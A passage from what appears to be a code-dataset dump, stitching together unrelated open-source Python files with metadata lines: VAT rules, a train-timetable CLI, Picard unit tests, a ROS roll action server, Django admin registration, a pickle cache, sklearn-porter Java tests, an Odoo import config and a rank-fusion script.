spec = ' '.join(lst)
if xlst is not None:
xlst = sorted(["!"+(i.name or i.value) for i in xlst])
spec += ' ' + ' '.join(xlst)
spec = spec.strip()
if spec:
elems.extend([label, " ", spec, E.br()])
x(_("columns"), fld.vat_columns, fld.exclude_vat_columns)
x(_("regimes"), fld.vat_regimes, fld.exclude_vat_regimes)
x(_("classes"), fld.vat_classes, fld.exclude_vat_classes)
elems += [
fld.__class__.__name__, ' ',
str(fld.dc),
"" if fld.both_dc else " only",
E.br()]
if len(fld.observed_fields):
names = []
for f in fld.observed_fields:
n = f.value
if f.value in fld.minus_observed_fields:
n = "- " + n
elif len(names) > 0:
n = "+ " + n
names.append(n)
elems += ['= ', ' '.join(names), E.br()]
return E.div(*forcetext(elems))
class VatRule(dd.Choice):
start_date = None
    end_date = None
vat_area = None
trade_type = None
vat_class = None
vat_regime = None
rate = ZERO
vat_account = None
# vat_returnable = None
vat_returnable_account = None
def __init__(self,
vat_class=None, rate=None,
vat_area=None, trade_type=None,
vat_regime=None, vat_account=None,
vat_returnable_account=None):
kw = dict(vat_area=vat_area)
if rate is not None:
kw.update(rate=Decimal(rate))
# if vat_returnable is None:
# vat_returnable = vat_returnable_account is not None
# kw.update(vat_returnable=vat_returnable)
if trade_type:
kw.update(trade_type=TradeTypes.get_by_name(trade_type))
if vat_regime:
kw.update(vat_regime=VatRegimes.get_by_name(vat_regime))
if vat_class:
kw.update(vat_class=VatClasses.get_by_name(vat_class))
if vat_account:
kw.update(vat_account=vat_account)
if vat_returnable_account:
kw.update(vat_returnable_account=vat_returnable_account)
# text = "{trade_type} {vat_area} {vat_class} {rate}".format(**kw)
super(VatRule, self).__init__(None, None, **kw)
def __str__(rule):
lst = []
only = []
lst.append(gettext("VAT rule {}: ".format(rule.value)))
if rule.trade_type is not None:
only.append(str(rule.trade_type))
if rule.vat_regime is not None:
only.append(str(rule.vat_regime))
if rule.vat_area is not None:
only.append(str(rule.vat_area))
if rule.vat_class is not None:
only.append(str(rule.vat_class))
if len(only):
lst.append(gettext("if ({}) then".format(', '.join(only))))
lst.append(gettext("apply {} %".format(rule.rate)))
lst.append(gettext("and book to {}").format(rule.vat_account))
if rule.vat_returnable_account is not None:
lst.append(gettext("(return to {})").format(rule.vat_returnable_account))
return '\n'.join(lst)
# kw = dict(
# trade_type=self.trade_type,
# vat_regime=self.vat_regime,
# vat_class=self.vat_class,
# rate=self.rate,
# vat_area=self.vat_area, seqno=self.seqno)
# return "{trade_type} {vat_area} {vat_class} {rate}".format(**kw)
class VatRules(dd.ChoiceList):
verbose_name = _("VAT rule")
verbose_name_plural = _("VAT rules")
item_class = VatRule
column_names = "value description"
@classmethod
def get_vat_rule(
cls, vat_area,
trade_type=None, vat_regime=None, vat_class=None,
date=None, default=models.NOT_PROVIDED):
for i in cls.get_list_items():
if i.vat_area is not None and vat_area != i.vat_area:
continue
if i.trade_type is not None and trade_type != i.trade_type:
continue
if i.vat_class is not None and vat_class != i.vat_class:
continue
if i.vat_regime is not None and vat_regime != i.vat_regime:
continue
if date is not None:
if i.start_date and i.start_date > date:
continue
if i.end_date and i.end_date < date:
continue
return i
if default is models.NOT_PROVIDED:
msg = _("No VAT rule for ({!r},{!r},{!r},{!r},{!r})").format(
trade_type, vat_class, vat_area, vat_regime,
dd.fds(date))
if False:
dd.logger.info(msg)
else:
raise Warning(msg)
return default
@dd.displayfield(_("Description"))
def description(cls, rule, ar):
return str(rule)
# we add a single rule with no rate and no conditions, iow any combination is
# allowed and no vat is applied. The declaration modules will clear this list
# and fill it with their rules.
VatRules.add_item()
|
bsd-2-clause
| 90,297,768,270,596,420 | 33.736434 | 93 | 0.55077 | false |
mackaiver/sEins-Module
|
cmd_line/seins_cmd.py
|
1
|
3548
|
#! /usr/bin/python3
# -*- coding: utf-8 -*-
__author__ = 'mackaiver'
# Let's start with a simple command-line tool
import argparse
import os
from colorama import init, Fore, Style
from seins.PageParser import DBPageParser, PageContentError
from seins.HtmlFetcher import FetcherException
# init colorama so it works on windows as well.
# The autoreset flag keeps me from using RESET on each line I want to color
init(autoreset=True)
import logging
# create a logger for this module
logger = logging.getLogger(__name__)
# the usual formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# create a handler and make it use the formatter
handler = logging.StreamHandler()
handler.setFormatter(formatter)
# now tell the logger to use the handler
logger.addHandler(handler)
logger.propagate = False
def is_valid_file(parser, arg):
(folder, t) = os.path.split(arg)
#logger.debug('given path is:' + os.path.split(arg))
if not folder == '' and not os.path.exists(folder):
parser.error("The folder %s does not exist!" % folder)
else:
return arg
def parse_args():
p = argparse.ArgumentParser(description='Lecker data fetching from EFA via the commandline. ',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('-d', default='Universität s-Bahnhof, Dortmund', metavar='--departing_station', type=str,
help='Name of the departing station')
p.add_argument('-a', default='Dortmund hbf', metavar='--arrival_station', type=str,
help='Name of the arrival station')
p.add_argument('-o', metavar='--output', type=lambda path: is_valid_file(p, path), help='will write the html '
'fetched from the dbwebsite'
' to the given path')
p.add_argument('-v', action="store_true", help='Show some debug and info logging output')
p.add_argument('-s', action="store_true", help='only display S-Bahn connections')
args = p.parse_args()
    # check for debug logging
if args.v:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARN)
return args.o, args.d, args.a, args.s
def main():
(output_path, departure, arrival, sbahn_only) = parse_args()
connections = []
try:
page = DBPageParser(departure, arrival)
connections = page.connections
if output_path:
with open(output_path, 'wt') as file:
file.write(page.html)
logger.info("Output written to " + output_path)
except PageContentError as e:
logger.error('Webpage returned an error message: ' + str(e))
except FetcherException as e:
logger.error('Fetcher could not get valid response from server: ' + str(e))
    # do some pretty printing
print('Connections from: ' + Style.BRIGHT + departure + Style.RESET_ALL +
' to: ' + Style.BRIGHT + arrival)
print(' departure, arrival, delay, connection')
for (d, a, delay, t) in connections:
        if sbahn_only and t.strip() != 'S':
continue
if delay and int(delay) >= 5:
print(d + ', ' + a + ', ' + Fore.RED + delay + Fore.RESET + ', ' + t)
else:
print(d + ', ' + a + ', ' + str(delay) + ', ' + t)
if __name__ == '__main__':
main()
|
mit
| -5,232,060,154,381,828,000 | 34.118812 | 120 | 0.604736 | false |
antlarr/picard
|
test/test_utils.py
|
1
|
12813
|
# -*- coding: utf-8 -*-
import builtins
from collections import namedtuple
import os.path
from test.picardtestcase import PicardTestCase
import unittest
from picard import util
from picard.const.sys import IS_WIN
from picard.util import (
find_best_match,
imageinfo,
sort_by_similarity,
)
# ensure _() is defined
if '_' not in builtins.__dict__:
builtins.__dict__['_'] = lambda a: a
class ReplaceWin32IncompatTest(PicardTestCase):
@unittest.skipUnless(IS_WIN, "windows test")
def test_correct_absolute_win32(self):
self.assertEqual(util.replace_win32_incompat("c:\\test\\te\"st/2"),
"c:\\test\\te_st/2")
self.assertEqual(util.replace_win32_incompat("c:\\test\\d:/2"),
"c:\\test\\d_/2")
@unittest.skipUnless(not IS_WIN, "non-windows test")
def test_correct_absolute_non_win32(self):
self.assertEqual(util.replace_win32_incompat("/test/te\"st/2"),
"/test/te_st/2")
self.assertEqual(util.replace_win32_incompat("/test/d:/2"),
"/test/d_/2")
def test_correct_relative(self):
self.assertEqual(util.replace_win32_incompat("A\"*:<>?|b"),
"A_______b")
self.assertEqual(util.replace_win32_incompat("d:tes<t"),
"d_tes_t")
def test_incorrect(self):
self.assertNotEqual(util.replace_win32_incompat("c:\\test\\te\"st2"),
"c:\\test\\te\"st2")
class SanitizeDateTest(PicardTestCase):
def test_correct(self):
self.assertEqual(util.sanitize_date("2006--"), "2006")
self.assertEqual(util.sanitize_date("2006--02"), "2006")
self.assertEqual(util.sanitize_date("2006 "), "2006")
self.assertEqual(util.sanitize_date("2006 02"), "")
self.assertEqual(util.sanitize_date("2006.02"), "")
self.assertEqual(util.sanitize_date("2006-02"), "2006-02")
def test_incorrect(self):
self.assertNotEqual(util.sanitize_date("2006--02"), "2006-02")
self.assertNotEqual(util.sanitize_date("2006.03.02"), "2006-03-02")
class TranslateArtistTest(PicardTestCase):
def test_latin(self):
self.assertEqual(u"Jean Michel Jarre", util.translate_from_sortname(u"Jean Michel Jarre", u"Jarre, Jean Michel"))
self.assertNotEqual(u"Jarre, Jean Michel", util.translate_from_sortname(u"Jean Michel Jarre", u"Jarre, Jean Michel"))
def test_kanji(self):
self.assertEqual(u"Tetsuya Komuro", util.translate_from_sortname(u"小室哲哉", u"Komuro, Tetsuya"))
self.assertNotEqual(u"Komuro, Tetsuya", util.translate_from_sortname(u"小室哲哉", u"Komuro, Tetsuya"))
self.assertNotEqual(u"小室哲哉", util.translate_from_sortname(u"小室哲哉", u"Komuro, Tetsuya"))
def test_kanji2(self):
self.assertEqual(u"Ayumi Hamasaki & Keiko", util.translate_from_sortname(u"浜崎あゆみ & KEIKO", u"Hamasaki, Ayumi & Keiko"))
self.assertNotEqual(u"浜崎あゆみ & KEIKO", util.translate_from_sortname(u"浜崎あゆみ & KEIKO", u"Hamasaki, Ayumi & Keiko"))
self.assertNotEqual(u"Hamasaki, Ayumi & Keiko", util.translate_from_sortname(u"浜崎あゆみ & KEIKO", u"Hamasaki, Ayumi & Keiko"))
def test_cyrillic(self):
self.assertEqual(U"Pyotr Ilyich Tchaikovsky", util.translate_from_sortname(u"Пётр Ильич Чайковский", u"Tchaikovsky, Pyotr Ilyich"))
self.assertNotEqual(u"Tchaikovsky, Pyotr Ilyich", util.translate_from_sortname(u"Пётр Ильич Чайковский", u"Tchaikovsky, Pyotr Ilyich"))
self.assertNotEqual(u"Пётр Ильич Чайковский", util.translate_from_sortname(u"Пётр Ильич Чайковский", u"Tchaikovsky, Pyotr Ilyich"))
class FormatTimeTest(PicardTestCase):
def test(self):
self.assertEqual("?:??", util.format_time(0))
self.assertEqual("3:00", util.format_time(179750))
self.assertEqual("3:00", util.format_time(179500))
self.assertEqual("2:59", util.format_time(179499))
self.assertEqual("59:59", util.format_time(3599499))
self.assertEqual("1:00:00", util.format_time(3599500))
self.assertEqual("1:02:59", util.format_time(3779499))
class HiddenFileTest(PicardTestCase):
@unittest.skipUnless(not IS_WIN, "non-windows test")
def test(self):
self.assertTrue(util.is_hidden('/a/b/.c.mp3'))
self.assertTrue(util.is_hidden('/a/.b/.c.mp3'))
self.assertFalse(util.is_hidden('/a/.b/c.mp3'))
class TagsTest(PicardTestCase):
def test_display_tag_name(self):
dtn = util.tags.display_tag_name
self.assertEqual(dtn('tag'), 'tag')
self.assertEqual(dtn('tag:desc'), 'tag [desc]')
self.assertEqual(dtn('tag:'), 'tag')
self.assertEqual(dtn('originalyear'), 'Original Year')
self.assertEqual(dtn('originalyear:desc'), 'Original Year [desc]')
self.assertEqual(dtn('~length'), 'Length')
self.assertEqual(dtn('~lengthx'), '~lengthx')
self.assertEqual(dtn(''), '')
class LinearCombinationTest(PicardTestCase):
def test_0(self):
parts = []
self.assertEqual(util.linear_combination_of_weights(parts), 0.0)
def test_1(self):
parts = [(1.0, 1), (1.0, 1), (1.0, 1)]
self.assertEqual(util.linear_combination_of_weights(parts), 1.0)
def test_2(self):
parts = [(0.0, 1), (0.0, 0), (1.0, 0)]
self.assertEqual(util.linear_combination_of_weights(parts), 0.0)
def test_3(self):
parts = [(0.0, 1), (1.0, 1)]
self.assertEqual(util.linear_combination_of_weights(parts), 0.5)
def test_4(self):
parts = [(0.5, 4), (1.0, 1)]
self.assertEqual(util.linear_combination_of_weights(parts), 0.6)
def test_5(self):
parts = [(0.95, 100), (0.05, 399), (0.0, 1), (1.0, 0)]
self.assertEqual(util.linear_combination_of_weights(parts), 0.2299)
def test_6(self):
parts = [(-0.5, 4)]
self.assertRaises(ValueError, util.linear_combination_of_weights, parts)
def test_7(self):
parts = [(0.5, -4)]
self.assertRaises(ValueError, util.linear_combination_of_weights, parts)
def test_8(self):
parts = [(1.5, 4)]
self.assertRaises(ValueError, util.linear_combination_of_weights, parts)
def test_9(self):
parts = ((1.5, 4))
self.assertRaises(TypeError, util.linear_combination_of_weights, parts)
class AlbumArtistFromPathTest(PicardTestCase):
def test_album_artist_from_path(self):
aafp = util.album_artist_from_path
file_1 = r"/10cc/Original Soundtrack/02 I'm Not in Love.mp3"
file_2 = r"/10cc - Original Soundtrack/02 I'm Not in Love.mp3"
file_3 = r"/Original Soundtrack/02 I'm Not in Love.mp3"
file_4 = r"/02 I'm Not in Love.mp3"
self.assertEqual(aafp(file_1, '', ''), ('Original Soundtrack', '10cc'))
self.assertEqual(aafp(file_2, '', ''), ('Original Soundtrack', '10cc'))
self.assertEqual(aafp(file_3, '', ''), ('Original Soundtrack', ''))
self.assertEqual(aafp(file_4, '', ''), ('', ''))
self.assertEqual(aafp(file_1, 'album', ''), ('album', ''))
self.assertEqual(aafp(file_2, 'album', ''), ('album', ''))
self.assertEqual(aafp(file_3, 'album', ''), ('album', ''))
self.assertEqual(aafp(file_4, 'album', ''), ('album', ''))
self.assertEqual(aafp(file_1, '', 'artist'), ('Original Soundtrack', 'artist'))
self.assertEqual(aafp(file_2, '', 'artist'), ('Original Soundtrack', 'artist'))
self.assertEqual(aafp(file_3, '', 'artist'), ('Original Soundtrack', 'artist'))
self.assertEqual(aafp(file_4, '', 'artist'), ('', 'artist'))
self.assertEqual(aafp(file_1, 'album', 'artist'), ('album', 'artist'))
self.assertEqual(aafp(file_2, 'album', 'artist'), ('album', 'artist'))
self.assertEqual(aafp(file_3, 'album', 'artist'), ('album', 'artist'))
self.assertEqual(aafp(file_4, 'album', 'artist'), ('album', 'artist'))
class ImageInfoTest(PicardTestCase):
def test_gif(self):
file = os.path.join('test', 'data', 'mb.gif')
with open(file, 'rb') as f:
self.assertEqual(
imageinfo.identify(f.read()),
(140, 96, 'image/gif', '.gif', 5806)
)
def test_png(self):
file = os.path.join('test', 'data', 'mb.png')
with open(file, 'rb') as f:
self.assertEqual(
imageinfo.identify(f.read()),
(140, 96, 'image/png', '.png', 11137)
)
def test_jpeg(self):
file = os.path.join('test', 'data', 'mb.jpg',)
with open(file, 'rb') as f:
self.assertEqual(
imageinfo.identify(f.read()),
(140, 96, 'image/jpeg', '.jpg', 8550)
)
def test_not_enough_data(self):
self.assertRaises(imageinfo.IdentificationError,
imageinfo.identify, "x")
self.assertRaises(imageinfo.NotEnoughData, imageinfo.identify, "x")
def test_invalid_data(self):
self.assertRaises(imageinfo.IdentificationError,
imageinfo.identify, "x" * 20)
self.assertRaises(imageinfo.UnrecognizedFormat,
imageinfo.identify, "x" * 20)
def test_invalid_png_data(self):
data = '\x89PNG\x0D\x0A\x1A\x0A' + "x" * 20
self.assertRaises(imageinfo.IdentificationError,
imageinfo.identify, data)
self.assertRaises(imageinfo.UnrecognizedFormat,
imageinfo.identify, data)
class CompareBarcodesTest(unittest.TestCase):
def test_same(self):
self.assertTrue(util.compare_barcodes('0727361379704', '0727361379704'))
self.assertTrue(util.compare_barcodes('727361379704', '727361379704'))
self.assertTrue(util.compare_barcodes('727361379704', '0727361379704'))
self.assertTrue(util.compare_barcodes('0727361379704', '727361379704'))
self.assertTrue(util.compare_barcodes(None, None))
self.assertTrue(util.compare_barcodes('', ''))
self.assertTrue(util.compare_barcodes(None, ''))
self.assertTrue(util.compare_barcodes('', None))
def test_not_same(self):
self.assertFalse(util.compare_barcodes('0727361379704', '0727361379705'))
self.assertFalse(util.compare_barcodes('727361379704', '1727361379704'))
self.assertFalse(util.compare_barcodes('0727361379704', None))
self.assertFalse(util.compare_barcodes(None, '0727361379704'))
class MbidValidateTest(unittest.TestCase):
def test_ok(self):
self.assertTrue(util.mbid_validate('2944824d-4c26-476f-a981-be849081942f'))
self.assertTrue(util.mbid_validate('2944824D-4C26-476F-A981-be849081942f'))
self.assertFalse(util.mbid_validate(''))
self.assertFalse(util.mbid_validate('Z944824d-4c26-476f-a981-be849081942f'))
self.assertFalse(util.mbid_validate('22944824d-4c26-476f-a981-be849081942f'))
self.assertFalse(util.mbid_validate('2944824d-4c26-476f-a981-be849081942ff'))
self.assertFalse(util.mbid_validate('2944824d-4c26.476f-a981-be849081942f'))
def test_not_ok(self):
self.assertRaises(TypeError, util.mbid_validate, 123)
self.assertRaises(TypeError, util.mbid_validate, None)
SimMatchTest = namedtuple('SimMatchTest', 'similarity name')
class SortBySimilarity(unittest.TestCase):
def setUp(self):
self.test_values = [
SimMatchTest(similarity=0.74, name='d'),
SimMatchTest(similarity=0.61, name='a'),
SimMatchTest(similarity=0.75, name='b'),
SimMatchTest(similarity=0.75, name='c'),
]
def candidates(self):
for value in self.test_values:
yield value
def test_sort_by_similarity(self):
results = [result.name for result in sort_by_similarity(self.candidates)]
self.assertEqual(results, ['b', 'c', 'd', 'a'])
def test_findbestmatch(self):
no_match = SimMatchTest(similarity=-1, name='no_match')
best_match = find_best_match(self.candidates, no_match)
self.assertEqual(best_match.result.name, 'b')
self.assertEqual(best_match.similarity, 0.75)
self.assertEqual(best_match.num_results, 4)
def test_findbestmatch_nomatch(self):
self.test_values = []
no_match = SimMatchTest(similarity=-1, name='no_match')
best_match = find_best_match(self.candidates, no_match)
self.assertEqual(best_match.result.name, 'no_match')
self.assertEqual(best_match.similarity, -1)
self.assertEqual(best_match.num_results, 0)
|
gpl-2.0
| -1,191,016,911,811,311,600 | 39.854839 | 143 | 0.62274 | false |
tsender/riptide_software
|
riptide_controllers/action/goToRoll.py
|
1
|
1173
|
#! /usr/bin/env python
import rospy
import actionlib
from riptide_msgs.msg import AttitudeCommand, Imu
import riptide_controllers.msg
def angleDiff(a1, a2):
return (a1 - a2 + 180) % 360 - 180
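# Worked examples (added comment): angleDiff returns the signed shortest
# rotation from a2 to a1 in degrees, always in [-180, 180), e.g.
# angleDiff(350, 10) == -20 and angleDiff(10, 350) == 20.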
class GoToRollAction(object):
def __init__(self):
self.rollPub = rospy.Publisher("/command/roll", AttitudeCommand, queue_size=1)
self._as = actionlib.SimpleActionServer("go_to_roll", riptide_controllers.msg.GoToRollAction, execute_cb=self.execute_cb, auto_start=False)
self._as.start()
def execute_cb(self, goal):
rospy.loginfo("Going to Roll " + str(goal.roll)+ " deg")
self.rollPub.publish(goal.roll, AttitudeCommand.POSITION)
while abs(angleDiff(rospy.wait_for_message("/state/imu", Imu).rpy_deg.x, goal.roll)) > 5:
rospy.sleep(0.05)
if self._as.is_preempt_requested():
rospy.loginfo('Preempted Go To Roll')
self._as.set_preempted()
return
rospy.loginfo("At Roll")
self._as.set_succeeded()
if __name__ == '__main__':
rospy.init_node('go_to_roll')
server = GoToRollAction()
rospy.spin()
|
bsd-2-clause
| -3,178,892,167,043,033,000 | 29.894737 | 147 | 0.615516 | false |
Saevon/webdnd
|
dnd/admin/__init__.py
|
1
|
1311
|
"""
Library admin site
"""
from dnd.admin.base import LibraryAdmin
from dnd.models.accounts import LibraryAccount
from dnd.models.library_entities.conditions import Condition
from dnd.models.library_entities.abilities import Ability, AbilityType
from dnd.models.library_entities.references import Article, Example, Rule, Term
from dnd.models.library_entities.skills import Skill, SkillSample
from dnd.models.library_entities.spells import CastingLevelClassPair, Spell, SpellDescriptor
from dnd.models.library_entities.classes import DnDClass
from dnd.models.units import ActionTimeDuration
from dnd.models.modifiers.saving_throws import SavingThrow
from dnd.models.modifiers.modifiers import Modifier
from dnd.models.sources import Source
DEFAULT = LibraryAdmin
library_admin_mapping = (
(ActionTimeDuration, DEFAULT),
(Article, DEFAULT),
(CastingLevelClassPair, DEFAULT),
(Condition, DEFAULT),
(DnDClass, DEFAULT),
(Example, DEFAULT),
(Ability, DEFAULT),
(AbilityType, DEFAULT),
(LibraryAccount, DEFAULT),
(Modifier, DEFAULT),
(Rule, DEFAULT),
(SavingThrow, DEFAULT),
(Skill, DEFAULT),
(SkillSample, DEFAULT),
(Source, DEFAULT),
(Spell, DEFAULT),
(SpellDescriptor, DEFAULT),
(Term, DEFAULT),
)
__all__ = [
    'library_admin_mapping',
]
|
mit
| 4,420,922,745,493,548,500 | 29.488372 | 92 | 0.750572 | false |
reinforceio/tensorforce-benchmark
|
rl_benchmark/db/cache.py
|
1
|
2832
|
# Copyright 2018 The RLgraph project. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Database cache class.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import os
import pickle
import re
from distutils.dir_util import mkpath
def get_cache_file_name(identifier):
    return re.sub(r'[\W_]+', '_', identifier)
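# Example (added comment): every run of non-alphanumeric characters collapses
# to a single underscore, so
# get_cache_file_name('https://example.org/run?id=1') == 'https_example_org_run_id_1'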
class Cache(object):
"""
Database cache class to store get requests. Since we assume that individual benchmarks are immutable, there
is no need to fetch them more than once from the database.
"""
def __init__(self, cache_path='~/.cache/reinforce.io/general/'):
self.cache_path = os.path.expanduser(cache_path)
def _get_cache_file_path(self, identifier):
"""
Return full cache file path.
Args:
identifier: object identifier (e.g. URL)
Returns: full path
"""
cache_file_name = get_cache_file_name(identifier)
cache_file_path = os.path.join(self.cache_path, cache_file_name)
return cache_file_path
def get(self, identifier):
"""
Get object from cache.
Args:
identifier: object identifier (e.g. URL)
Returns: cached object
"""
cache_file_path = self._get_cache_file_path(identifier)
if os.path.isfile(cache_file_path):
with open(cache_file_path, 'rb') as fp:
result = pickle.load(fp)
return result
return None
def save(self, data, identifier):
"""
Save object to cache.
Args:
data: object to cache
identifier: object identifier (e.g. URL)
Returns: boolean
"""
cache_file_path = self._get_cache_file_path(identifier)
# Create path directory
if not os.path.isdir(self.cache_path):
logging.info("Creating cache directory at {}".format(self.cache_path))
mkpath(self.cache_path, 0o755)
with open(cache_file_path, 'wb') as fp:
logging.debug("Storing result in cache file at {}".format(cache_file_path))
pickle.dump(data, fp)
return True
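# Usage sketch (added comment; `fetch_benchmark` is a hypothetical helper):
#
#     cache = Cache()
#     data = cache.get(url)
#     if data is None:
#         data = fetch_benchmark(url)
#         cache.save(data, url)
#
# Benchmarks are treated as immutable here, so a cache hit never needs
# revalidation.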
|
apache-2.0
| -7,377,568,597,197,831,000 | 27.039604 | 111 | 0.617938 | false |
nok/sklearn-porter
|
tests/language/Java.py
|
1
|
2036
|
# -*- coding: utf-8 -*-
import os
from sklearn_porter import Porter
from sklearn_porter.utils.Environment import Environment
from sklearn_porter.utils.Shell import Shell
class Java(object):
LANGUAGE = 'java'
# noinspection PyPep8Naming
def setUp(self):
Environment.check_deps(['mkdir', 'rm', 'java', 'javac'])
self._init_test()
def _init_test(self):
self.tmp_fn = 'Brain'
def _port_estimator(self, export_data=False, embed_data=False):
self.estimator.fit(self.X, self.y)
Shell.call('rm -rf tmp')
Shell.call('mkdir tmp')
filename = self.tmp_fn + '.java'
path = os.path.join('tmp', filename)
with open(path, 'w') as f:
porter = Porter(self.estimator, language=self.LANGUAGE)
if export_data:
out = porter.export(class_name='Brain',
method_name='foo',
export_data=True,
export_dir='tmp')
else:
out = porter.export(class_name='Brain',
method_name='foo',
embed_data=embed_data)
f.write(out)
if export_data:
cmd = 'javac -cp ./gson.jar {}'.format(path)
Shell.call(cmd)
else:
cmd = 'javac ' + path
Shell.call(cmd)
def pred_in_py(self, features, cast=True):
pred = self.estimator.predict([features])[0]
return int(pred) if cast else float(pred)
def pred_in_custom(self, features, cast=True, export_data=False):
if export_data:
cmd = 'java -cp ./gson.jar:./tmp {}'.format(self.tmp_fn).split()
cmd += ['./tmp/data.json']
else:
cmd = 'java -classpath tmp {}'.format(self.tmp_fn).split()
args = [str(f).strip() for f in features]
cmd += args
pred = Shell.check_output(cmd)
return int(pred) if cast else float(pred)
|
mit
| -9,213,031,744,138,941,000 | 32.933333 | 76 | 0.523084 | false |
grap/odoo-script
|
data_integration/per_activity/TED_configuration.py
|
1
|
2606
|
#! /usr/bin/env python
# -*- encoding: utf-8 -*-
# Global Settings
COMPANY_ID = 45 # res.company 'Teddy Beer'
# Product Global Settings
PRODUCT_FIRST_LINE = False  # line number of the first product
DEFAULT_POS_CATEG_ID = False # pos.category 'Others'
TAX_GROUPS = {
'0.0': False,
'2.1': False,
'5.5': False,
'10.0': False,
'20.0': False,
}
DEFAULT_TAX_GROUP = False
# DEFAULT_PRODUCT_CATEGORY = 223 # "revente / divers / divers"
DEFAULT_PRODUCT_CATEGORY = 227 # "transformations / divers / divers"
# Product Information
COLUMN_PRODUCT_NAME = False
COLUMN_PRODUCT_UOM_ID = False
COLUMN_PRODUCT_CATEG_ID = False
COLUMN_PRODUCT_POS_CATEG_ID = False
# Product Supplier information
COLUMN_PRODUCT_SUPPLIER_NAME = False
COLUMN_PRODUCT_SUPPLIER_PRODUCT_CODE = False
COLUMN_PRODUCT_SUPPLIER_PRODUCT_NAME = False
COLUMN_PRODUCT_SUPPLIER_GROSS_PRICE = False
COLUMN_PRODUCT_SUPPLIER_DISCOUNT = False
COLUMN_PRODUCT_SUPPLIER_INVOICE_QTY = False
COLUMN_PRODUCT_SUPPLIER_PACKAGE_QTY = False
# Product Sale Information
COLUMN_PRODUCT_MAKER = False
COLUMN_PRODUCT_EAN_13 = False
COLUMN_PRODUCT_VOLUME = False
COLUMN_PRODUCT_NET_WEIGHT = False
COLUMN_PRODUCT_COUNTRY_ID = False
COLUMN_PRODUCT_TAX_GROUP_ID = False
COLUMN_PRODUCT_STANDARD_PRICE = False
COLUMN_PRODUCT_SALE_PRICE = False
COLUMN_PRODUCT_SALE_ALTERNATIVE = False
# Product Food Information
COLUMN_PRODUCT_LABEL_1 = False
COLUMN_PRODUCT_LABEL_2 = False
COLUMN_PRODUCT_LABEL_3 = False
# Partner Global Settings
PARTNER_FIRST_LINE = 2
# partner Information
COLUMN_PARTNER_NAME = 'B'
COLUMN_PARTNER_EMAIL = 'G'
COLUMN_PARTNER_PHONE = 'F'
COLUMN_PARTNER_FAX = False
COLUMN_PARTNER_MOBILE = False
COLUMN_PARTNER_WEBSITE = False
COLUMN_PARTNER_VAT = False
COLUMN_PARTNER_STREET = 'C'
COLUMN_PARTNER_ZIP = 'D'
COLUMN_PARTNER_CITY = 'E'
COLUMN_PARTNER_COUNTRY_ID = False
COLUMN_PARTNER_COMMENT = 'H'
COLUMN_PARTNER_IS_CUSTOMER = 'A'
COLUMN_PARTNER_IS_SUPPLIER = False
COLUMN_PARTNER_IS_INDIVIDUAL = False
# Lead Global Settings
LEAD_FIRST_LINE = 2
DEFAULT_CRM_CASE_STAGE = 'jamais contacte'
# DEFAULT_LEAD_TYPE = 'lead'
DEFAULT_LEAD_TYPE = 'opportunity'
# Lead Information
COLUMN_LEAD_NAME = 'B'
COLUMN_LEAD_STAGE = 'A'
COLUMN_LEAD_EMAIL = 'G'
COLUMN_LEAD_PHONE = 'F'
COLUMN_LEAD_MOBILE = False
COLUMN_LEAD_STREET = 'C'
COLUMN_LEAD_ZIP = 'D'
COLUMN_LEAD_CITY = 'E'
COLUMN_LEAD_COUNTRY_ID = False
COLUMN_LEAD_DESCRIPTION = 'H'
CRM_CASE_STAGES = {
'jamais contacte': 39,
'1er contact': 40,
'contact en cours': 41,
'contact fait': 44,
'ne pas recontacter/mort': 43,
}
|
agpl-3.0
| 3,428,622,632,381,325,300 | 25.581633 | 73 | 0.716315 | false |
knutz3n/mopidy-yamaha
|
mopidy_yamaha/mixer.py
|
1
|
1347
|
"""Mixer that controls volume using a Yamaha receiver."""
from __future__ import unicode_literals
import logging
from mopidy import mixer
import pykka
from mopidy_yamaha import talker
logger = logging.getLogger(__name__)
class YamahaMixer(pykka.ThreadingActor, mixer.Mixer):
name = 'yamaha'
def __init__(self, config):
super(YamahaMixer, self).__init__(config)
self.host = config['yamaha']['host']
self.source = config['yamaha']['source']
self.party_mode = config['yamaha']['party_mode']
self._volume_cache = 0
self._yamaha_talker = None
def get_volume(self):
return self._volume_cache
def set_volume(self, volume):
self._volume_cache = volume
self._yamaha_talker.set_volume(volume)
self.trigger_volume_changed(volume)
return True
def get_mute(self):
return False
def set_mute(self, mute):
self._yamaha_talker.mute(mute)
self.trigger_mute_changed(mute)
def on_start(self):
self._start_yamaha_talker()
def _start_yamaha_talker(self):
self._yamaha_talker = talker.YamahaTalker.start(
host=self.host,
source=self.source,
party_mode=self.party_mode,
).proxy()
self._volume_cache = self._yamaha_talker.get_volume().get()
|
apache-2.0
| 997,962,807,195,209,600 | 23.053571 | 67 | 0.621381 | false |
fmance/deep-medical-ir
|
ranking/combine.py
|
1
|
1874
|
import os
import sys
from collections import defaultdict
sys.path.insert(0, "../utils/")
import utils
CLASS_ID = sys.argv[1]
YEAR = sys.argv[2]
CLASSIFIERS = [
"LinearSVC.squared_hinge.l2",
"SGDClassifier.hinge.l2",
"SGDClassifier.hinge.elasticnet",
"SGDClassifier.squared_loss.l2",
"SGDClassifier.squared_loss.elasticnet",
"SGDClassifier.epsilon_insensitive.l2",
"SGDClassifier.epsilon_insensitive.elasticnet",
"Pipeline.epsilon_insensitive.l2"
]
def getResultsFiles():
resultsFiles = []
for classifier in CLASSIFIERS:
resultsFiles.append("../ir/results/results-" + YEAR + ".txt.reranked." + CLASS_ID + "." + classifier)
return resultsFiles
def readMultipleResults(resultsFiles):
resultsList = []
for resultsFile in resultsFiles:
results = utils.readResults(resultsFile)
resultsList.append(results)
return resultsList
def combSum(resultsList):
combSumResults = {}
qids = resultsList[0].keys()
for qid in qids:
queryResultsList = [results[qid] for results in resultsList]
resultsSum = defaultdict(float)
for didRankScores in queryResultsList:
for did, _, score in didRankScores:
